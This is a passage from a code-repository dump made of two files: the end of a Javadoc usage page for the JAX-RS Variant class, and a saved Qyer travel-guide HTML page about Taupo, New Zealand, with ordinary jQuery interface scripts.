Uses of <A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A> in <A HREF="../../../../../javax/ws/rs/core/package-summary.html">javax.ws.rs.core</A></FONT></TH>
</TR>
</TABLE>
<P>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../../javax/ws/rs/core/package-summary.html">javax.ws.rs.core</A> that return <A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A></CODE></FONT></TD>
<TD><CODE><B>Request.</B><B><A HREF="../../../../../javax/ws/rs/core/Request.html#selectVariant(java.util.List)">selectVariant</A></B>(java.util.List<<A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A>> variants)</CODE>
<BR>
Select the representation variant that best matches the request.</TD>
</TR>
</TABLE>
<P>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../../javax/ws/rs/core/package-summary.html">javax.ws.rs.core</A> that return types with arguments of type <A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>abstract java.util.List<<A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A>></CODE></FONT></TD>
<TD><CODE><B>Variant.VariantListBuilder.</B><B><A HREF="../../../../../javax/ws/rs/core/Variant.VariantListBuilder.html#build()">build</A></B>()</CODE>
<BR>
Build a list of representation variants from the current state of
the builder.</TD>
</TR>
</TABLE>
<P>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../../javax/ws/rs/core/package-summary.html">javax.ws.rs.core</A> with parameters of type <A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static <A HREF="../../../../../javax/ws/rs/core/Response.ResponseBuilder.html" title="class in javax.ws.rs.core">Response.ResponseBuilder</A></CODE></FONT></TD>
<TD><CODE><B>Response.</B><B><A HREF="../../../../../javax/ws/rs/core/Response.html#ok(java.lang.Object, javax.ws.rs.core.Variant)">ok</A></B>(java.lang.Object entity,
<A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A> variant)</CODE>
<BR>
Create a new ResponseBuilder that contains a representation.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>abstract <A HREF="../../../../../javax/ws/rs/core/Response.ResponseBuilder.html" title="class in javax.ws.rs.core">Response.ResponseBuilder</A></CODE></FONT></TD>
<TD><CODE><B>Response.ResponseBuilder.</B><B><A HREF="../../../../../javax/ws/rs/core/Response.ResponseBuilder.html#variant(javax.ws.rs.core.Variant)">variant</A></B>(<A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A> variant)</CODE>
<BR>
Set representation metadata on the ResponseBuilder.</TD>
</TR>
</TABLE>
<P>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left" COLSPAN="2">Method parameters in <A HREF="../../../../../javax/ws/rs/core/package-summary.html">javax.ws.rs.core</A> with type arguments of type <A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static <A HREF="../../../../../javax/ws/rs/core/Response.ResponseBuilder.html" title="class in javax.ws.rs.core">Response.ResponseBuilder</A></CODE></FONT></TD>
<TD><CODE><B>Response.</B><B><A HREF="../../../../../javax/ws/rs/core/Response.html#notAcceptable(java.util.List)">notAcceptable</A></B>(java.util.List<<A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A>> variants)</CODE>
<BR>
Create a new ResponseBuilder for a not acceptable response.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A></CODE></FONT></TD>
<TD><CODE><B>Request.</B><B><A HREF="../../../../../javax/ws/rs/core/Request.html#selectVariant(java.util.List)">selectVariant</A></B>(java.util.List<<A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A>> variants)</CODE>
<BR>
Select the representation variant that best matches the request.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>abstract <A HREF="../../../../../javax/ws/rs/core/Response.ResponseBuilder.html" title="class in javax.ws.rs.core">Response.ResponseBuilder</A></CODE></FONT></TD>
<TD><CODE><B>Response.ResponseBuilder.</B><B><A HREF="../../../../../javax/ws/rs/core/Response.ResponseBuilder.html#variants(java.util.List)">variants</A></B>(java.util.List<<A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A>> variants)</CODE>
<BR>
Add a Vary header that lists the available variants.</TD>
</TR>
</TABLE>
<P>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../index.html?javax/ws/rs/core/class-use/Variant.html" target="_top"><B>FRAMES</B></A>
<A HREF="Variant.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
Copyright © 2009 <a href="http://www.sun.com/">Sun Microsystems, Inc</a>. All Rights Reserved.
</BODY>
</HTML>
|
WebContent/localdata/Oceania/Taupo_277.html | onwebbe/travelplan | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="google-site-verification" content="DVVM1p1HEm8vE1wVOQ9UjcKP--pNAsg_pleTU5TkFaM" />
<meta http-equiv="mobile-agent" content="format=html5; url=http://m.qyer.com/place/taupo/profile/" />
<meta http-equiv="Cache-Control" content="no-transform" />
<title>陶波概况_陶波简介_陶波介绍 - 穷游网</title>
<meta name="keywords" content="陶波速写,陶波当地人生活,陶波历史,陶波文化,陶波环境" />
<meta name="description" content="陶波旅游攻略,陶波概况,穷游网为旅行者提供陶波速写、陶波当地人生活、陶波历史、陶波文化、陶波环境等信息,为穷游er制订陶波出游计划提供参考。" />
<link rel="shortcut icon" href="http://www.qyer.com/favicon.ico" />
<script type='text/javascript'>
var PLACE = PLACE || {
TYPE:'city',
PID :''
};
if (PLACE.TYPE == "poi"){
PLACE.CITYID = "";
}
</script>
<script type="text/javascript">
window.__qRequire__ = {
version: '1409305653',
combineCSS: []
};
</script>
<link href="http://static.qyer.com/min/?version=1409305643&b=css&f=common/base.css,common/tpl.css,common/headfoot.css,place5/style.css" rel="stylesheet" type="text/css" media="screen" />
<script language="javascript" src="http://static.qyer.com/min/?version=1409305643&b=js&f=common/jquery/jquery-1.7.1.min.js,common/util.js,common/global.js,user/friend.js,user/user.js,common/jquery.cookie.js,common/upward.js,place/doing.js,place/oper_comment.js,place/comment.js,common/underscore-min.js,guide/component/jncommon.js,place/useful.js,place/oper_useful.js,common/usercard.js,common/jquery.form.js" /></script>
</head>
<body>
<div class="qyer_header_fixed">
<div class="qyer_header_bg">
<div class="qyer_header">
<div class="qyer_head_logo"><a href="http://www.qyer.com/" data-bn-ipg="head-logo"><img src="//static.qyer.com/images/common/head/logo.png" alt="穷游网" title="穷游网 - 旅途永无穷尽" width="80" height="38" /></a></div>
<ul class="qyer_head_nav">
<li class="qyer_head_nav_item qyer_head_nav_item_this" id="qyer_head_nav_item_place"><a href="http://place.qyer.com/" class="qyer_head_nav_item_tit qyer_head_nav_item_place" data-bn-ipg="head-nav-place">目的地</a></li>
<li class="qyer_head_nav_item " id="qyer_head_nav_item_guide"><a href="http://guide.qyer.com/" class="qyer_head_nav_item_tit qyer_head_nav_item_guide" data-bn-ipg="head-nav-guide">锦囊</a></li>
<li class="qyer_head_nav_item " id="qyer_head_nav_item_plan"><a href="http://plan.qyer.com/" class="qyer_head_nav_item_tit qyer_head_nav_item_plan" data-bn-ipg="head-nav-plan">行程助手</a></li>
<li class="qyer_head_nav_item " id="qyer_head_nav_item_sns"><span class="qyer_head_nav_item_tit qyer_head_nav_item_sns">社区</span>
<div class="qyer_head_subnav_bg">
<div class="qyer_head_subnav_top"></div>
<ul class="qyer_head_subnav_list">
<li><a href="http://bbs.qyer.com/" class="qyer_head_nav_item_bbs" data-bn-ipg="head-nav-bbs">论坛</a></li>
<li><a href="http://ask.qyer.com/" class="qyer_head_nav_item_ask" data-bn-ipg="head-nav-ask">问答</a></li>
<li><a href="http://pictrip.qyer.com/" class="qyer_head_nav_item_pictrip" data-bn-ipg="head-nav-pictrip">微游记</a></li>
<li><a href="http://qlab.qyer.com/" class="qyer_head_nav_item_qlab" data-bn-ipg="head-nav-qlab">穷游出品</a></li>
</ul>
</div>
</li>
<li class="qyer_head_nav_item " id="qyer_head_nav_item_lastm"><a href="http://z.qyer.com/" class="qyer_head_nav_item_tit qyer_head_nav_item_lastm" data-bn-ipg="head-nav-lastminute">折扣</a></li>
<li class="qyer_head_nav_item " id="qyer_head_nav_item_hotel"><a href="http://hotel.qyer.com/" class="qyer_head_nav_item_tit qyer_head_nav_item_hotel" data-bn-ipg="head-nav-hotel">酒店</a></li>
<li class="qyer_head_nav_item " id="qyer_head_nav_item_yd"><span class="qyer_head_nav_item_tit qyer_head_nav_item_yd">预订</span>
<div class="qyer_head_subnav_bg">
<div class="qyer_head_subnav_top"></div>
<ul class="qyer_head_subnav_list">
<li><a href="http://flight.qyer.com/" class="qyer_head_nav_item_plane" data-bn-ipg="head-nav-plane">机票</a></li>
<li><a href="http://www.qyer.com/hoteldeal/" class="qyer_head_nav_item_hoteldeal" data-bn-ipg="head-nav-hoteldeal">特价酒店</a></li>
<li><a href="http://bx.qyer.com/" class="qyer_head_nav_item_insure" data-bn-ipg="head-nav-insure">保险</a></li>
<li><a href="http://qyer.ailvxing.com/" class="qyer_head_nav_item_visa" data-bn-ipg="head-nav-visa">签证</a></li>
<li><a href="http://www.qyer.com/shop/" class="qyer_head_nav_item_shop" data-bn-ipg="head-nav-shop">华人旅馆</a></li>
<li><a href="http://www.qyer.com/goto.php?url=http://www.tapotiexie.com" target="_blank" class="qyer_head_nav_item_liner" data-bn-ipg="head-nav-liner">邮轮</a></li>
<li><a href="http://car.qyer.com/" class="qyer_head_nav_item_car" data-bn-ipg="head-nav-car">租车</a></li>
</ul>
</div>
</li>
</ul>
<script type="text/javascript" id="loginjs" src="//user.qyer.com/user_action_logininfo_m_userloginsync_4207"></script> <script src="//static.qyer.com/js/common/search.js" type="text/javascript"></script>
</div>
</div>
</div>
<script type="text/javascript">
//头部导航菜单 新的
(function($){
$("#qyer_head_nav_item_sns, #qyer_head_nav_item_yd").hover(function(){
$(this).addClass("qyer_head_nav_item_current");
$(this).find(".qyer_head_subnav_bg").show();
},function(){
$(this).removeClass("qyer_head_nav_item_current");
$(this).find(".qyer_head_subnav_bg").hide();
});
//header随屏幕滚动
var yuming = window.location.hostname;
if(yuming=="ask.qyer.com"){
$(".qyer_header_bg").css("position","fixed");
}
//alert(window.location.hostname);
})(jQuery);
</script>
<!--token:d41d8cd98f00b204e9800998ecf8427e-->
<div class="qyer_head_crumbg">
<div class="qyer_head_crumb">
<span class="text"><a href="http://www.qyer.com" data-bn-ipg="3-1">首页</a></span>
<span class="space">></span>
<span class="text drop"><a href="http://place.qyer.com" data-bn-ipg="3-2">目的地</a><em class="arrow" data="crumb_continents"></em></span>
<span class="space">></span><span class="text drop"><a href="http://place.qyer.com/oceania/" data-bn-ipg="3-3">大洋洲</a><em class="arrow" data="crumb_country"></em></span><span class="space">></span><span class="text drop"><a href="http://place.qyer.com/new-zealand/" data-bn-ipg="3-4">新西兰</a><em class="arrow" data="crumb_city"></em></span><span class="space">></span><span class="text drop">陶波<em class="arrow" data="crumb_cate"></em></span>
<div class="qyer_head_crumb_pulldown crumb_continents" style="width: 160px;">
<ul>
<li><a href="http://place.qyer.com/asia/" data-bn-ipg="3-2-1">亚洲 Asia</a></li>
<li><a href="http://place.qyer.com/europe/" data-bn-ipg="3-2-2">欧洲 Europe</a></li>
<li><a href="http://place.qyer.com/africa/" data-bn-ipg="3-2-3">非洲 Africa</a></li>
<li><a href="http://place.qyer.com/north-america/" data-bn-ipg="3-2-4">北美 North America</a></li>
<li><a href="http://place.qyer.com/south-america/" data-bn-ipg="3-2-5">南美 South America</a></li>
<li><a href="http://place.qyer.com/oceania/" data-bn-ipg="3-2-6">大洋洲 Oceania</a></li>
<li><a href="http://place.qyer.com/antarctica/" data-bn-ipg="3-2-7">南极洲 Antarctica</a></li>
</ul>
<div class="cb"></div>
</div>
<div class="qyer_head_crumb_pulldown crumb_country" >
<ul>
<li><a href="http://place.qyer.com/australia/" data-bn-ipg="3-3-2">澳大利亚 Australia</a></li>
<li><a href="http://place.qyer.com/new-zealand/" data-bn-ipg="3-3-2">新西兰 New Zealand</a></li>
<li><a href="http://place.qyer.com/northern-mariana-islands/" data-bn-ipg="3-3-2">北马里亚纳群岛 Northern Mariana Islands</a></li>
<li><a href="http://place.qyer.com/fiji/" data-bn-ipg="3-3-2">斐济 Fiji</a></li>
<li><a href="http://place.qyer.com/palau/" data-bn-ipg="3-3-2">帕劳 Palau</a></li>
<li><a href="http://place.qyer.com/guam/" data-bn-ipg="3-3-2">关岛 Guam</a></li>
<li><a href="http://place.qyer.com/french-polynesia/" data-bn-ipg="3-3-2">法属波利尼西亚 French Polynesia</a></li>
<li><a href="http://place.qyer.com/apolofirl/" data-bn-ipg="3-3-2">艾普罗菲尔 Apolofirl</a></li>
<li><a href="http://place.qyer.com/vanuatu/" data-bn-ipg="3-3-2">瓦努阿图 Vanuatu</a></li>
<li><a href="http://place.qyer.com/tonga/" data-bn-ipg="3-3-2">汤加 Tonga</a></li>
</ul>
<ul>
<li><a href="http://place.qyer.com/new-caledonia/" data-bn-ipg="3-3-2">新喀里多尼亚 New Caledonia</a></li>
<li><a href="http://place.qyer.com/samoa/" data-bn-ipg="3-3-2">萨摩亚 Samoa</a></li>
<li><a href="http://place.qyer.com/the-cook-islands/" data-bn-ipg="3-3-2">库克群岛 The Cook Islands</a></li>
<li><a href="http://place.qyer.com/papua-new-guinea/" data-bn-ipg="3-3-2">巴布亚新几内亚 Papua New Guinea</a></li>
<li><a href="http://place.qyer.com/marshall-islands/" data-bn-ipg="3-3-2">马绍尔群岛 Marshall Islands</a></li>
<li><a href="http://place.qyer.com/federated-states-of-micronesia/" data-bn-ipg="3-3-2">密克罗尼西亚联邦 Federated States Of Micronesia</a></li>
<li><a href="http://place.qyer.com/tuvalu/" data-bn-ipg="3-3-2">图瓦卢 Tuvalu</a></li>
<li><a href="http://place.qyer.com/nauru/" data-bn-ipg="3-3-2">瑙鲁 Nauru</a></li>
<li><a href="http://place.qyer.com/solomon-islands/" data-bn-ipg="3-3-2">所罗门群岛 Solomon Islands</a></li>
<li><a href="http://place.qyer.com/american-samoa/" data-bn-ipg="3-3-2">美属萨摩亚 American Samoa</a></li>
</ul>
<div class="cb"></div>
<p class="more"><a href="http://place.qyer.com/oceania/" data-bn-ipg="3-3-2">更多国家>></a></p>
</div>
<div class="qyer_head_crumb_pulldown crumb_city" >
<ul>
<li><a href="http://place.qyer.com/auckland/" data-bn-ipg="3-4-2">奥克兰 Auckland</a></li>
<li><a href="http://place.qyer.com/queenstown/" data-bn-ipg="3-4-2">皇后镇 Queenstown</a></li>
<li><a href="http://place.qyer.com/south-island/" data-bn-ipg="3-4-2">新西兰南岛 South Island</a></li>
<li><a href="http://place.qyer.com/christchurch/" data-bn-ipg="3-4-2">基督城 Christchurch</a></li>
<li><a href="http://place.qyer.com/lake-tekapo/" data-bn-ipg="3-4-2">蒂卡普湖 Lake tekapo</a></li>
<li><a href="http://place.qyer.com/dunedin/" data-bn-ipg="3-4-2">但尼丁 Dunedin</a></li>
<li><a href="http://place.qyer.com/rotorua/" data-bn-ipg="3-4-2">罗托鲁阿 Rotorua</a></li>
<li><a href="http://place.qyer.com/wanaka/" data-bn-ipg="3-4-2">瓦纳卡 Wanaka</a></li>
<li><a href="http://place.qyer.com/mount-cook-national-park/" data-bn-ipg="3-4-2">库克山国家公园 Mount Cook National Park</a></li>
<li><a href="http://place.qyer.com/te-anau/" data-bn-ipg="3-4-2">蒂阿瑙 Te anau</a></li>
</ul>
<ul>
<li><a href="http://place.qyer.com/arrowtown/" data-bn-ipg="3-4-2">箭镇 Arrowtown</a></li>
<li><a href="http://place.qyer.com/fox-glacier/" data-bn-ipg="3-4-2">福克斯冰川 Fox Glacier</a></li>
<li><a href="http://place.qyer.com/wellington-new-zealand/" data-bn-ipg="3-4-2">惠灵顿 Wellington</a></li>
<li><a href="http://place.qyer.com/milford-sound/" data-bn-ipg="3-4-2">米尔福德峡湾 Milford sound</a></li>
<li><a href="http://place.qyer.com/kaikoura/" data-bn-ipg="3-4-2">凯库拉 Kaikoura</a></li>
<li><a href="http://place.qyer.com/greymouth/" data-bn-ipg="3-4-2">格雷茅斯 Greymouth</a></li>
<li><a href="http://place.qyer.com/taupo/" data-bn-ipg="3-4-2">陶波 Taupo</a></li>
<li><a href="http://place.qyer.com/oamaru/" data-bn-ipg="3-4-2">奥马鲁 Oamaru</a></li>
<li><a href="http://place.qyer.com/hamilton-new-zealand/" data-bn-ipg="3-4-2">汉密尔顿 Hamilton</a></li>
<li><a href="http://place.qyer.com/franz-josef/" data-bn-ipg="3-4-2">弗朗茨约瑟夫冰川 Franz Josef</a></li>
</ul>
<div class="cb"></div>
<p class="more"><a href="http://place.qyer.com/new-zealand/" data-bn-ipg="3-4-2">更多城市>></a></p>
</div>
<div class="qyer_head_crumb_pulldown crumb_cate" style="width: 160px;">
<ul>
<li><a href="http://place.qyer.com/taupo/sight/">景点</a></li>
<li><a href="http://place.qyer.com/taupo/activity/">体验</a></li>
<li><a href="http://place.qyer.com/taupo/transportation/">交通</a></li>
<li><a href="http://place.qyer.com/taupo/hotel/">住宿</a></li>
<li><a href="http://place.qyer.com/taupo/shopping/">购物</a></li>
<li><a href="http://place.qyer.com/taupo/food/">美食</a></li>
</ul>
<div class="cb"></div>
</div>
</div>
</div>
<script src="http://static.qyer.com/js/place/crumbbox.js" type="text/javascript"></script>
<script>
function entrycheckuser(uid){
if(uid==null){
if (ajaxlogin() == false) {
ckform();
return false;
}
}else{
location.href= "http://place.qyer.com/taupo/profile/"+"edit/";
return false;
}
}
</script>
<style>
.imgbgstyle{
width:200px;
height:133px;
background-origin:content; /*从content区域开始显示背景*/
background-position:50% 50%; /*图片上下左右居中*/
background-size:contain; /*保持图像本身的宽高比例,将图片缩放到宽度或高度正好适应定义背景的区域*/
background-repeat:no-repeat; /*图像不重复显示*/
}
</style>
<style>
.pla_main2 .pla_txtquote pre {
white-space: pre-wrap;
}
.pla_main2 .pla_txtquote p {
margin: 1em 0;
}
.pla_main2 .pla_txtquote table { width:100%;}
.pla_main2 .pla_txtquote table th, .pla_main2 .pla_txtquote table td {
border:1px solid #e6e8ea;
padding:5px;
}
.pla_main2 .pla_txtquote table td {
background-color:#fff;
}
.pla_main2 .pla_txtquote table th {
background-color:#72af8b;
color:#fff;
font-weight:bold;
text-align:center;
}
.pla_main2 .pla_txtquote blockquote {
margin:1em 0;
background-color:#FFFABF;
border:1px solid #F1D152;
padding:10px;
}
.pla_main2 .pla_txtquote em {
font-weight:bold;
}
</style>
<div class="pla_topbar clearfix">
<div class="clearfix">
<div class="pla_topbar_names">
<p class="pl_topbox_en" id="pl_topbox_en"><a href="http://place.qyer.com/taupo/" data-bn-ipg="place-city-top-title">Taupo</a></p>
<div class="clearfix">
<p class="pl_topbox_cn fontYaHei"><a href="http://place.qyer.com/taupo/" data-bn-ipg="place-city-top-title">陶波</a></p>
</div>
</div>
<script>
//标题文字大小
(function($){
var topbox_en = $("#pl_topbox_en");
var topbox_en_len = topbox_en.text().length;
if(topbox_en_len>50){
topbox_en.css("font-size","18px");
}
else if(topbox_en_len>40){
topbox_en.css("font-size","22px");
}
else if(topbox_en_len>35){
topbox_en.css("font-size","26px");
}
else if(topbox_en_len>30){
topbox_en.css("font-size","30px");
}
else if(topbox_en_len>25){
topbox_en.css("font-size","34px");
}
})(jQuery);
$(function(){
//头部重要提示
$(".pi_prompt .initial").click(function(){
$(".pi_prompt_lay").show();
});
$(".pi_prompt_lay .close, .pi_prompt_lay .title").click(function(){
$(".pi_prompt_lay").hide();
});
});
</script>
<div class="pla_topbar_tools">
<ul class="pl_topbox_btn">
<li class="pl_topbox_want" id="pl_topbox_want">
<p class="num"><span><strong id="doings_planto_counts">0</strong>人想去</span><em></em></p>
<a href="javascript:void(0);" class="click" id="doings_planto_button" data-bn-ipg="place-city-top-planto">想去</a>
</li>
<li class="pl_topbox_been" id="pl_topbox_been">
<p class="num"><span><strong id="doings_beento_counts">0</strong>人去过</span><em></em></p>
<a href="javascript:void(0);" class="click" id="doings_beento_button" data-bn-ipg="place-city-top-beento">去过</a>
</li>
<li class="pl_topbox_lived" id="pl_topbox_lived">
<p class="num"><span><strong id="doings_lived_counts">0</strong>人生活过</span><em></em></p>
<a href="javascript:void(0);" class="click" id="doings_lived_button" data-bn-ipg="place-city-top-lived">生活过</a>
</li>
<!--addPlan-->
<script src="http://static.qyer.com/models/basic/js/jquery-ui/jquery.ui.core.min.js" type="text/javascript"></script>
<script src="http://static.qyer.com/models/basic/js/require.js" type="text/javascript"></script>
<script src="http://static.qyer.com/models/basic/js/qyerUtil.js" type="text/javascript"></script>
<script src="http://static.qyer.com/models/common/component/planPool/page.js" type="text/javascript"></script>
<!--addPlan end-->
<li id="pl_topbox_addplan" class="pl_topbox_addplan">
<a class="click" data-bn-ipg='place-addtoplan-button'
data-userid="" data-type="city" data-pid="9162" data-addtoplan="true" href="javascript:void(0);" data-bn-ipg="place-city-addtoplan">加入行程</a>
</li>
</ul>
<p class="pl_topbox_numbeen fontYaHei"><em id="doings_beento_counts_big">还没有</em>人去过这里</p>
</div>
<script type="text/javascript">
var type="city";
var pid="9162";
var uid="";
if (type == "poi"){
var cityid = "";
} else {
var cityid = 0;
}
if(uid =="0"){
uid = "";
}
function doings_callback(){
window.reload();
};
var isaddimpress="";
if (parseInt(isaddimpress) == 0){
isaddimpress = false;
}else{
isaddimpress = true;
}
function showdoing(d){
//console.log([type,pid,uid,cityid]);
var data = {"isdo":false,"counts":{"plantocounts":36,"beentocounts":1062,"livedcounts":1}};
//doing.getDoings(pid,type,d,function(data){
//console.log(data.counts.plantocounts);
if(data.counts.plantocounts==0){
$("#doings_planto_counts").html("还没有");
}else{
$("#doings_planto_counts").html(data.counts.plantocounts);
}
if(data.isdo.planto==1){
$("#pl_topbox_want").removeClass().addClass("pl_topbox_want_ed");
}
if(data.counts.beentocounts==0){
$("#doings_beento_counts").html("还没有");
$("#doings_beento_counts_big").html("还没有");
}else{
$("#doings_beento_counts").html(data.counts.beentocounts);
$("#doings_beento_counts_big").html(data.counts.beentocounts);
}
if(data.isdo.beento==1){
$("#pl_topbox_been").removeClass().addClass("pl_topbox_been_ed");
}
if(type!="poi"){
if(data.counts.livedcounts==0){
$("#doings_lived_counts").html("还没有");
}else{
$("#doings_lived_counts").html(data.counts.livedcounts);
}
if(data.isdo.lived==1){
$("#pl_topbox_lived").removeClass().addClass("pl_topbox_lived_ed");
}
}
$("#doings_planto_button").click(function(){
if(uid==""){
ajaxlogin(undefined, undefined, undefined, "doings_callback");
}else{
doing['planto'+type](parseInt(1-parseInt(data.isdo.planto)),pid,function(rs){
if(rs.result=="ok"){
data.isdo.planto = parseInt(1-parseInt(data.isdo.planto));
if(data.isdo.planto==1){
data.counts.plantocounts++;
}else{
data.counts.plantocounts--;
}
if(data.counts.plantocounts<0){data.counts.plantocounts=0;}
$("#doings_planto_counts").html(data.counts.plantocounts);
if(data.isdo.planto=="1"){
$(".pl_topbox_want").removeClass().addClass("pl_topbox_want_ed");
if(type=="poi" || cityid){
//显示香港,巴黎,曼谷的city guide图层;
var poiguidecookie = jQuery.cookie("city_poi_cookies") ? jQuery.cookie("city_poi_cookies") : "";
if(jQuery.inArray('',poiguidecookie.split(","))==-1){
var left = $("#pl_topbox_want").offset().left;
$("#app_puplayer").css("left",left-364).show();
}
}
}else{
$(".pl_topbox_want_ed").removeClass().addClass("pl_topbox_want");
}
}else{
tips.show(rs.data.msg);
}
});
}
});
$("#doings_beento_button").click(function(){
if(QYER.uid==""){
ajaxlogin(undefined, undefined, undefined, "doings_callback");
}else{
//showdoing(1);
doing['beento'+type](parseInt(1-parseInt(data.isdo.beento)),pid,function(rs){
//$("#doings_beento_button").unbind("click");
//showdoing(1);
if(rs.result=="ok"){
data.isdo.beento = parseInt(1-parseInt(data.isdo.beento));
if(data.isdo.beento==1){
data.counts.beentocounts++;
}else{
data.counts.beentocounts--;
}
if(data.counts.beentocounts<0){data.counts.beentocounts=0;}
$("#doings_beento_counts").html(data.counts.beentocounts);
if(data.counts.beentocounts==0){
$("#doings_beento_counts").html("还没有");
$("#doings_beento_counts_big").html("还没有");
}else{
$("#doings_beento_counts").html(data.counts.beentocounts);
$("#doings_beento_counts_big").html(data.counts.beentocounts);
}
if(data.isdo.beento=="1"){
$(".pl_topbox_been").removeClass().addClass("pl_topbox_been_ed");
if(type=="city"){
if(parseInt(rs.data.poi_not_count) == 0){
qyerUI.popup.ajax({url:'/api.php?action=placeleadpoi&oper=showform&source_type=15&id='+pid, width:'720',isclose:'show'});
}else{
//城市有未去过的poi
qyerUI.popup.ajax({url:'/api.php?action=placelead&oper=showform&id='+pid+'&showbatchdoings=1', width:'720',isclose:'hide'});
}
}
if(!isaddimpress && type=="country"){
